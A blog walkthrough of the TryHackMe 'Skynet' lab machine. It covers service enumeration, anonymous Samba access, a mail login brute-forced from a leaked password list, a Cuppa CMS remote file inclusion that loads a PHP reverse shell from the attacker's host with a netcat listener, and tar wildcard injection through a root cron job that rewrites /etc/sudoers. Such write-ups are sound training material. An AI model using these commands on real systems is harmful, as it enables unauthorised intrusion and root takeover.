Featured image of post Skynet
TryHackMe

Skynet

A vulnerable Terminator themed Linux machine.

Link to the machine

Answer 1

My target IP : 10.10.84.89

We start by simply launching an nmap scan.

1

 nmap -sC -sV -oN nmap -O -T4 [@Target_IP]

Image 1

We can see that 6 services are open, including port 80. We navigate to a web browser to see what it is.

Image 2

We launch gobuster to discover hidden files or directories.

Image 3

The “admin” directory is forbidden, so we focus on the “squirrelmail” directory.

Image 4

We could attempt a brute force attack, but for now, I prefer to revisit the information provided by nmap, which indicates the presence of a Samba share. To exploit it, we can use the tool “enum4linux.”

1

 enum4linux 10.10.84.89

Image 5

Bingo! We learn two things: anonymous account usage is allowed, and there is also a share named “milesdyson.”

Let’s connect anonymously and download the content of the “milesdyson” share.

Image 6

Image 7

We find that “log1.txt” is a password list.

At this stage, we have a list of passwords and a possible username: milesdyson. We try to connect to the mail server using the passwords from this list and the username milesdyson. Success! It was quite fast.

Answer 2

Image 8

In one of the emails, we find the new password for this user, allowing us to connect to their share.

Image 9

In the “notes” directory, we find the file “important.txt.”

Image 10

The document mentions a CMS. Let’s see how it looks in the browser.

Image 11

Here is our hidden directory.

Answer 3

Not knowing what to do at this stage, I relaunch gobuster on this new address.

Image 12

Image 13

We get something called Cuppa CMS. Let’s search if there is a known vulnerability.

Image 14

Image 15

Remote File Inclusion, let’s try to inject a reverse shell.

Answer 4

I’ll use the one from pentestmonkey.

My target IP : 10.10.220.244

Remember to modify the address in the script with your own machine’s :

Image 16

In one terminal, we start the Python server where our script is located.

In another terminal, we listen on port 1234 (if you haven’t changed it):

1

 nc -lvnp 1234

So in a shell :

Image 17

And in another :

Image 18

Then, in the web browser:

1

 http://10.10.84.89/[NAME OF HIDDEN DIRECTORY]/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.220.244:8000/php-reverse-shell.php

Image 19

The reverse shell is in place!

Image 20

Image 21

Answer 5

Now it’s time to escalate privileges.

Image 22

I can’t use the “sudo -l” command, so I decide to take a look at the crontab, and there we find an interesting file.

Image 23

I’ll check GTFOBins to see if we can do something with that “tar” command executed as root.

Image 24

1
2
3

echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "/var/www/html"  > "--checkpoint-action=exec=sh privesc.sh"
echo "/var/www/html"  > --checkpoint=1

Image 25

After 1 minute :

Image 26

Image 27

© 2024 - 2026 Site de Nemo
Généré avec Hugo
Thème Stack conçu par Jimmy